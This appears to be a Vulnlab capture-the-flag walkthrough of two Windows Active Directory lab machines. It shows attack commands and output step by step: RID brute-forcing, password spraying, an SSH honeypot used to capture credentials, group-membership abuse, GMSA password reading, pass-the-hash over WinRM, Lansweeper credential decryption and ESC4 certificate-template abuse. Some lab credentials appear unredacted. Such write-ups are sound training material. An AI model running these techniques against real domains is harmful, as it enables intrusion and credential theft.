SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

make a users file and crack it with username=password

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Login to browser as user intern on http://sweep.vl:81/ , go to scanning -> scanning credentials ( see that saved creds are used ), go to scanning -> scanning targets -> add range target vulnab vpn ip , and use saved creds

 

and on Kali machine  run SSH Honeypot, I used sshesame, tthe only thing important to change is the sshesame.yaml file

and set listen_address: 10.8.2.138:22 [ in my case]

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected

Logon now to http://sweep.vl:81/Default.aspx as user svc-inventory-lnx

do your thing with more privs

or simpler way after adding svc_inventory_lnx to the “Lansweeper Admins” group.

unintended way : https://github.com/Yeeb1/SharpLansweeperDecrypt

But 1st as Bloodhound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

then Win-RM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

then Winrm to the box as admin

──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>



 

 

 

 

 

 

 

 

.

 

 

vulnlab-sendai

vulnlab sendai

a medium windows machine

enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

rid-brute

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Check for password must change

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

change smb pass

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerating some more

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Do the bloodhound thing

We have a GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSAPasword of  mgtsvc$

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

Evil-WinRm to the box & PrivEsccheck.ps1

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+

.

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

findings

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse the template

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Run certipy-ad again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
